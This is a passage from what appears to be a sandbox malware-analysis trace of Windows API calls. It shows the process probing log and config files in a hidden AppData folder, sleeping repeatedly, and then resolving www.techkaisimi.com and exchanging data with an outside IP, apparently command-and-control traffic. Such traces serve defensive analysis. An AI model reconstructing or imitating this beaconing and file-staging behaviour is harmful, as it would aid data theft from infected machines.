"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.746] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.746] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0198.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.746] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.746] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0198.746] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e07550) returned 1 [0198.746] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0198.746] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0198.746] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0198.746] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9e067d0) returned 1 [0198.747] Sleep (dwMilliseconds=0x7d0) [0198.749] Sleep (dwMilliseconds=0x7d0) [0198.751] Sleep (dwMilliseconds=0x7d0) [0198.752] Sleep (dwMilliseconds=0x7d0) [0198.754] Sleep (dwMilliseconds=0x7d0) [0198.794] Sleep (dwMilliseconds=0x7d0) [0198.796] Sleep (dwMilliseconds=0x7d0) [0198.797] Sleep (dwMilliseconds=0x7d0) [0198.799] Sleep (dwMilliseconds=0x7d0) [0198.803] Sleep (dwMilliseconds=0x7d0) [0198.807] Sleep (dwMilliseconds=0x7d0) [0198.809] Sleep (dwMilliseconds=0x7d0) [0198.810] Sleep (dwMilliseconds=0x7d0) [0198.812] Sleep (dwMilliseconds=0x7d0) [0198.813] Sleep (dwMilliseconds=0x7d0) [0198.815] Sleep (dwMilliseconds=0x7d0) [0198.816] Sleep (dwMilliseconds=0x7d0) [0198.818] Sleep (dwMilliseconds=0x7d0) [0198.819] Sleep (dwMilliseconds=0x7d0) [0198.821] Sleep (dwMilliseconds=0x7d0) [0198.823] Sleep (dwMilliseconds=0x7d0) [0198.825] Sleep (dwMilliseconds=0x7d0) [0198.826] Sleep (dwMilliseconds=0x7d0) [0198.828] Sleep (dwMilliseconds=0x7d0) [0198.829] Sleep (dwMilliseconds=0x7d0) [0198.831] Sleep (dwMilliseconds=0x7d0) [0198.832] Sleep (dwMilliseconds=0x7d0) [0198.834] Sleep (dwMilliseconds=0x7d0) [0198.836] Sleep (dwMilliseconds=0x7d0) [0198.838] Sleep (dwMilliseconds=0x7d0) [0198.839] Sleep (dwMilliseconds=0x7d0) [0198.841] Sleep (dwMilliseconds=0x7d0) [0198.842] Sleep (dwMilliseconds=0x7d0) [0198.844] Sleep (dwMilliseconds=0x7d0) [0198.845] Sleep (dwMilliseconds=0x7d0) [0198.847] Sleep (dwMilliseconds=0x7d0) [0198.849] Sleep (dwMilliseconds=0x7d0) [0198.850] Sleep (dwMilliseconds=0x7d0) [0198.852] Sleep (dwMilliseconds=0x7d0) [0198.853] Sleep (dwMilliseconds=0x7d0) [0198.855] Sleep (dwMilliseconds=0x7d0) [0198.857] Sleep (dwMilliseconds=0x7d0) [0198.858] Sleep (dwMilliseconds=0x7d0) [0198.860] Sleep (dwMilliseconds=0x7d0) [0198.861] Sleep (dwMilliseconds=0x7d0) [0198.863] Sleep (dwMilliseconds=0x7d0) [0198.864] Sleep (dwMilliseconds=0x7d0) [0198.866] Sleep (dwMilliseconds=0x7d0) [0198.869] Sleep (dwMilliseconds=0x7d0) [0198.872] Sleep (dwMilliseconds=0x7d0) [0198.874] Sleep (dwMilliseconds=0x7d0) [0198.875] Sleep (dwMilliseconds=0x7d0) [0198.877] Sleep (dwMilliseconds=0x7d0) [0198.879] Sleep (dwMilliseconds=0x7d0) [0198.881] Sleep (dwMilliseconds=0x7d0) [0198.883] Sleep (dwMilliseconds=0x7d0) [0198.885] Sleep (dwMilliseconds=0x7d0) [0198.886] Sleep (dwMilliseconds=0x7d0) [0198.888] Sleep (dwMilliseconds=0x7d0) [0198.891] Sleep (dwMilliseconds=0x7d0) [0198.893] Sleep (dwMilliseconds=0x7d0) [0198.895] Sleep (dwMilliseconds=0x7d0) [0198.896] Sleep (dwMilliseconds=0x7d0) [0198.898] Sleep (dwMilliseconds=0x7d0) [0198.899] Sleep (dwMilliseconds=0x7d0) [0198.901] Sleep (dwMilliseconds=0x7d0) [0198.902] Sleep (dwMilliseconds=0x7d0) [0198.904] Sleep (dwMilliseconds=0x7d0) [0198.905] Sleep (dwMilliseconds=0x7d0) [0198.907] Sleep (dwMilliseconds=0x7d0) [0198.908] Sleep (dwMilliseconds=0x7d0) [0198.910] Sleep (dwMilliseconds=0x7d0) [0198.912] Sleep (dwMilliseconds=0x7d0) [0198.914] Sleep (dwMilliseconds=0x7d0) [0198.916] Sleep (dwMilliseconds=0x7d0) [0198.917] Sleep (dwMilliseconds=0x7d0) [0198.919] Sleep (dwMilliseconds=0x7d0) [0198.920] Sleep (dwMilliseconds=0x7d0) [0198.922] Sleep (dwMilliseconds=0x7d0) [0198.924] Sleep (dwMilliseconds=0x7d0) [0198.927] Sleep (dwMilliseconds=0x7d0) [0198.929] Sleep (dwMilliseconds=0x7d0) [0198.931] Sleep (dwMilliseconds=0x7d0) [0198.932] Sleep (dwMilliseconds=0x7d0) [0198.935] Sleep (dwMilliseconds=0x7d0) [0198.937] Sleep (dwMilliseconds=0x7d0) [0198.939] Sleep (dwMilliseconds=0x7d0) [0198.940] Sleep (dwMilliseconds=0x7d0) [0198.941] Sleep (dwMilliseconds=0x7d0) [0198.943] Sleep (dwMilliseconds=0x7d0) [0198.945] Sleep (dwMilliseconds=0x7d0) [0198.946] Sleep (dwMilliseconds=0x7d0) [0198.948] Sleep (dwMilliseconds=0x7d0) [0198.949] Sleep (dwMilliseconds=0x7d0) [0198.950] Sleep (dwMilliseconds=0x7d0) [0198.952] Sleep (dwMilliseconds=0x7d0) [0198.953] Sleep (dwMilliseconds=0x7d0) [0198.955] Sleep (dwMilliseconds=0x7d0) [0198.958] Sleep (dwMilliseconds=0x7d0) [0198.959] Sleep (dwMilliseconds=0x7d0) [0198.961] Sleep (dwMilliseconds=0x7d0) [0198.962] Sleep (dwMilliseconds=0x7d0) [0198.964] Sleep (dwMilliseconds=0x7d0) [0198.965] Sleep (dwMilliseconds=0x7d0) [0198.970] Sleep (dwMilliseconds=0x7d0) [0198.971] Sleep (dwMilliseconds=0x7d0) [0198.972] Sleep (dwMilliseconds=0x7d0) [0198.974] Sleep (dwMilliseconds=0x7d0) [0198.976] Sleep (dwMilliseconds=0x7d0) [0198.977] Sleep (dwMilliseconds=0x7d0) [0198.981] Sleep (dwMilliseconds=0x7d0) [0198.983] Sleep (dwMilliseconds=0x7d0) [0198.984] Sleep (dwMilliseconds=0x7d0) [0198.986] Sleep (dwMilliseconds=0x7d0) [0198.987] Sleep (dwMilliseconds=0x7d0) [0198.989] Sleep (dwMilliseconds=0x7d0) [0198.990] Sleep (dwMilliseconds=0x7d0) [0198.992] Sleep (dwMilliseconds=0x7d0) [0198.993] Sleep (dwMilliseconds=0x7d0) [0198.995] Sleep (dwMilliseconds=0x7d0) [0198.997] Sleep (dwMilliseconds=0x7d0) [0198.999] Sleep (dwMilliseconds=0x7d0) [0199.001] Sleep (dwMilliseconds=0x7d0) [0199.002] Sleep (dwMilliseconds=0x7d0) [0199.003] Sleep (dwMilliseconds=0x7d0) [0199.005] Sleep (dwMilliseconds=0x7d0) [0199.006] Sleep (dwMilliseconds=0x7d0) [0199.008] Sleep (dwMilliseconds=0x7d0) [0199.009] Sleep (dwMilliseconds=0x7d0) [0199.013] Sleep (dwMilliseconds=0x7d0) [0199.014] Sleep (dwMilliseconds=0x7d0) [0199.016] Sleep (dwMilliseconds=0x7d0) [0199.017] Sleep (dwMilliseconds=0x7d0) [0199.018] Sleep (dwMilliseconds=0x7d0) [0199.020] Sleep (dwMilliseconds=0x7d0) [0199.022] Sleep (dwMilliseconds=0x7d0) [0199.023] Sleep (dwMilliseconds=0x7d0) [0199.025] Sleep (dwMilliseconds=0x7d0) [0199.026] Sleep (dwMilliseconds=0x7d0) [0199.027] Sleep (dwMilliseconds=0x7d0) [0199.029] Sleep (dwMilliseconds=0x7d0) [0199.030] Sleep (dwMilliseconds=0x7d0) [0199.033] Sleep (dwMilliseconds=0x7d0) [0199.035] Sleep (dwMilliseconds=0x7d0) [0199.037] Sleep (dwMilliseconds=0x7d0) [0199.038] Sleep (dwMilliseconds=0x7d0) [0199.040] Sleep (dwMilliseconds=0x7d0) [0199.041] Sleep (dwMilliseconds=0x7d0) [0199.042] Sleep (dwMilliseconds=0x7d0) [0199.044] Sleep (dwMilliseconds=0x7d0) [0199.047] Sleep (dwMilliseconds=0x7d0) [0199.048] Sleep (dwMilliseconds=0x7d0) [0199.050] Sleep (dwMilliseconds=0x7d0) [0199.052] Sleep (dwMilliseconds=0x7d0) [0199.054] Sleep (dwMilliseconds=0x7d0) [0199.057] Sleep (dwMilliseconds=0x7d0) [0199.060] Sleep (dwMilliseconds=0x7d0) [0199.061] Sleep (dwMilliseconds=0x7d0) [0199.063] Sleep (dwMilliseconds=0x7d0) [0199.064] Sleep (dwMilliseconds=0x7d0) [0199.066] Sleep (dwMilliseconds=0x7d0) [0199.067] Sleep (dwMilliseconds=0x7d0) [0199.070] Sleep (dwMilliseconds=0x7d0) [0199.071] Sleep (dwMilliseconds=0x7d0) [0199.073] Sleep (dwMilliseconds=0x7d0) [0199.074] Sleep (dwMilliseconds=0x7d0) [0199.078] Sleep (dwMilliseconds=0x7d0) [0199.079] Sleep (dwMilliseconds=0x7d0) [0199.081] Sleep (dwMilliseconds=0x7d0) [0199.082] Sleep (dwMilliseconds=0x7d0) [0199.084] Sleep (dwMilliseconds=0x7d0) [0199.085] Sleep (dwMilliseconds=0x7d0) [0199.087] Sleep (dwMilliseconds=0x7d0) [0199.088] Sleep (dwMilliseconds=0x7d0) [0199.090] Sleep (dwMilliseconds=0x7d0) [0199.092] Sleep (dwMilliseconds=0x7d0) [0199.093] Sleep (dwMilliseconds=0x7d0) [0199.095] Sleep (dwMilliseconds=0x7d0) [0199.096] Sleep (dwMilliseconds=0x7d0) [0199.099] Sleep (dwMilliseconds=0x7d0) [0199.101] Sleep (dwMilliseconds=0x7d0) [0199.102] Sleep (dwMilliseconds=0x7d0) [0199.104] Sleep (dwMilliseconds=0x7d0) [0199.106] Sleep (dwMilliseconds=0x7d0) [0199.107] Sleep (dwMilliseconds=0x7d0) [0199.109] Sleep (dwMilliseconds=0x7d0) [0199.110] Sleep (dwMilliseconds=0x7d0) [0199.112] Sleep (dwMilliseconds=0x7d0) [0199.113] Sleep (dwMilliseconds=0x7d0) [0199.160] Sleep (dwMilliseconds=0x7d0) [0199.162] Sleep (dwMilliseconds=0x7d0) [0199.167] Sleep (dwMilliseconds=0x7d0) [0199.171] Sleep (dwMilliseconds=0x7d0) [0199.172] Sleep (dwMilliseconds=0x7d0) [0199.174] Sleep (dwMilliseconds=0x7d0) [0199.178] Sleep (dwMilliseconds=0x7d0) [0199.180] Sleep (dwMilliseconds=0x7d0) [0199.181] Sleep (dwMilliseconds=0x7d0) [0199.183] Sleep (dwMilliseconds=0x7d0) [0199.184] Sleep (dwMilliseconds=0x7d0) [0199.186] Sleep (dwMilliseconds=0x7d0) [0199.187] Sleep (dwMilliseconds=0x7d0) [0199.189] Sleep (dwMilliseconds=0x7d0) [0199.190] Sleep (dwMilliseconds=0x7d0) [0199.192] Sleep (dwMilliseconds=0x7d0) [0199.193] Sleep (dwMilliseconds=0x7d0) [0199.195] Sleep (dwMilliseconds=0x7d0) [0199.196] Sleep (dwMilliseconds=0x7d0) [0199.201] Sleep (dwMilliseconds=0x7d0) [0199.203] Sleep (dwMilliseconds=0x7d0) [0199.204] Sleep (dwMilliseconds=0x7d0) [0199.206] Sleep (dwMilliseconds=0x7d0) [0199.207] Sleep (dwMilliseconds=0x7d0) [0199.212] Sleep (dwMilliseconds=0x7d0) [0199.214] Sleep (dwMilliseconds=0x7d0) [0199.215] Sleep (dwMilliseconds=0x7d0) [0199.217] Sleep (dwMilliseconds=0x7d0) [0199.218] Sleep (dwMilliseconds=0x7d0) [0199.223] Sleep (dwMilliseconds=0x7d0) [0199.224] Sleep (dwMilliseconds=0x7d0) [0199.226] Sleep (dwMilliseconds=0x7d0) [0199.227] Sleep (dwMilliseconds=0x7d0) [0199.229] Sleep (dwMilliseconds=0x7d0) [0199.230] Sleep (dwMilliseconds=0x7d0) [0199.232] Sleep (dwMilliseconds=0x7d0) [0199.234] Sleep (dwMilliseconds=0x7d0) [0199.235] Sleep (dwMilliseconds=0x7d0) [0199.237] Sleep (dwMilliseconds=0x7d0) [0199.238] Sleep (dwMilliseconds=0x7d0) [0199.240] Sleep (dwMilliseconds=0x7d0) [0199.245] Sleep (dwMilliseconds=0x7d0) [0199.247] Sleep (dwMilliseconds=0x7d0) [0199.248] Sleep (dwMilliseconds=0x7d0) [0199.250] Sleep (dwMilliseconds=0x7d0) [0199.255] Sleep (dwMilliseconds=0x7d0) [0199.257] Sleep (dwMilliseconds=0x7d0) [0199.258] Sleep (dwMilliseconds=0x7d0) [0199.260] Sleep (dwMilliseconds=0x7d0) [0199.261] Sleep (dwMilliseconds=0x7d0) [0199.266] Sleep (dwMilliseconds=0x7d0) [0199.268] Sleep (dwMilliseconds=0x7d0) [0199.271] Sleep (dwMilliseconds=0x7d0) [0199.273] Sleep (dwMilliseconds=0x7d0) [0199.274] Sleep (dwMilliseconds=0x7d0) [0199.276] Sleep (dwMilliseconds=0x7d0) [0199.277] Sleep (dwMilliseconds=0x7d0) [0199.279] Sleep (dwMilliseconds=0x7d0) [0199.280] Sleep (dwMilliseconds=0x7d0) [0199.282] Sleep (dwMilliseconds=0x7d0) [0199.283] Sleep (dwMilliseconds=0x7d0) [0199.285] Sleep (dwMilliseconds=0x7d0) [0199.296] Sleep (dwMilliseconds=0x7d0) [0199.298] Sleep (dwMilliseconds=0x7d0) [0199.299] Sleep (dwMilliseconds=0x7d0) [0199.301] Sleep (dwMilliseconds=0x7d0) [0199.302] Sleep (dwMilliseconds=0x7d0) [0199.306] Sleep (dwMilliseconds=0x7d0) [0199.308] Sleep (dwMilliseconds=0x7d0) [0199.310] Sleep (dwMilliseconds=0x7d0) [0199.311] Sleep (dwMilliseconds=0x7d0) [0199.313] Sleep (dwMilliseconds=0x7d0) [0199.314] Sleep (dwMilliseconds=0x7d0) [0199.316] Sleep (dwMilliseconds=0x7d0) [0199.317] Sleep (dwMilliseconds=0x7d0) [0199.319] Sleep (dwMilliseconds=0x7d0) [0199.320] Sleep (dwMilliseconds=0x7d0) [0199.322] Sleep (dwMilliseconds=0x7d0) [0199.323] Sleep (dwMilliseconds=0x7d0) [0199.325] Sleep (dwMilliseconds=0x7d0) [0199.326] Sleep (dwMilliseconds=0x7d0) [0199.328] Sleep (dwMilliseconds=0x7d0) [0199.329] Sleep (dwMilliseconds=0x7d0) [0199.331] Sleep (dwMilliseconds=0x7d0) [0199.332] Sleep (dwMilliseconds=0x7d0) [0199.334] Sleep (dwMilliseconds=0x7d0) [0199.335] Sleep (dwMilliseconds=0x7d0) [0199.337] Sleep (dwMilliseconds=0x7d0) [0199.338] Sleep (dwMilliseconds=0x7d0) [0199.340] Sleep (dwMilliseconds=0x7d0) [0199.341] Sleep (dwMilliseconds=0x7d0) [0199.343] Sleep (dwMilliseconds=0x7d0) [0199.344] Sleep (dwMilliseconds=0x7d0) [0199.346] Sleep (dwMilliseconds=0x7d0) [0199.347] Sleep (dwMilliseconds=0x7d0) [0199.349] Sleep (dwMilliseconds=0x7d0) [0199.350] Sleep (dwMilliseconds=0x7d0) [0199.352] Sleep (dwMilliseconds=0x7d0) [0199.353] Sleep (dwMilliseconds=0x7d0) [0199.355] Sleep (dwMilliseconds=0x7d0) [0199.357] Sleep (dwMilliseconds=0x7d0) [0199.358] Sleep (dwMilliseconds=0x7d0) [0199.360] Sleep (dwMilliseconds=0x7d0) [0199.361] Sleep (dwMilliseconds=0x7d0) [0199.363] Sleep (dwMilliseconds=0x7d0) [0199.364] Sleep (dwMilliseconds=0x7d0) [0199.366] Sleep (dwMilliseconds=0x7d0) [0199.367] Sleep (dwMilliseconds=0x7d0) [0199.369] Sleep (dwMilliseconds=0x7d0) [0199.371] Sleep (dwMilliseconds=0x7d0) [0199.376] Sleep (dwMilliseconds=0x7d0) [0199.377] Sleep (dwMilliseconds=0x7d0) [0199.379] Sleep (dwMilliseconds=0x7d0) [0199.380] Sleep (dwMilliseconds=0x7d0) [0199.382] Sleep (dwMilliseconds=0x7d0) [0199.383] Sleep (dwMilliseconds=0x7d0) [0199.385] Sleep (dwMilliseconds=0x7d0) [0199.386] Sleep (dwMilliseconds=0x7d0) [0199.388] Sleep (dwMilliseconds=0x7d0) [0199.389] Sleep (dwMilliseconds=0x7d0) [0199.391] Sleep (dwMilliseconds=0x7d0) [0199.394] Sleep (dwMilliseconds=0x7d0) [0199.396] Sleep (dwMilliseconds=0x7d0) [0199.409] Sleep (dwMilliseconds=0x7d0) [0199.453] Sleep (dwMilliseconds=0x7d0) [0199.538] Sleep (dwMilliseconds=0x7d0) [0199.600] Sleep (dwMilliseconds=0x7d0) [0199.622] socket (af=2, type=1, protocol=6) returned 0x1c70 [0199.623] getaddrinfo (in: pNodeName="www.techkaisimi.com", pServiceName="80", pHints=0x9e76bb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e76be8 | out: ppResult=0x9e76be8*=0xa05f050*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f923b0*(sa_family=2, sin_port=0x50, sin_addr="70.39.125.244"), ai_next=0xa05e110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f924f0*(sa_family=2, sin_port=0x50, sin_addr="64.32.22.102"), ai_next=0xa05e9d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92b50*(sa_family=2, sin_port=0x50, sin_addr="107.161.23.204"), ai_next=0xa05ebd0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f928d0*(sa_family=2, sin_port=0x50, sin_addr="209.141.38.71"), ai_next=0xa05e710*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f923d0*(sa_family=2, sin_port=0x50, sin_addr="45.58.190.82"), ai_next=0xa05e210*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f928f0*(sa_family=2, sin_port=0x50, sin_addr="168.235.88.209"), ai_next=0xa05e750*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92910*(sa_family=2, sin_port=0x50, sin_addr="204.188.203.155"), ai_next=0xa05e790*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92430*(sa_family=2, sin_port=0x50, sin_addr="192.161.187.200"), ai_next=0xa05e810*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92470*(sa_family=2, sin_port=0x5000, sin_addr=0x5c54fbc6), ai_next=0xa05e350*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92530, ai_next=0x0))))))))))) returned 0 [0199.702] connect (s=0x1c70, name=0x9f923b0*(sa_family=2, sin_port=0x50, sin_addr="70.39.125.244"), namelen=16) returned 0 [0199.866] send (s=0x1c70, buf=0x82e10fa*, len=169, flags=0) returned 169 [0199.866] setsockopt (s=0x1c70, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0199.866] recv (in: s=0x1c70, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 436 [0200.056] closesocket (s=0x1c70) returned 0 [0200.056] Sleep (dwMilliseconds=0x7d0) [0200.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.058] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0200.059] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9480) returned 1 [0200.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.059] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.059] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0200.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.059] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.059] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f9510) returned 1 [0200.059] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.059] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0200.059] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0200.060] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f84c0) returned 1 [0200.060] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.060] 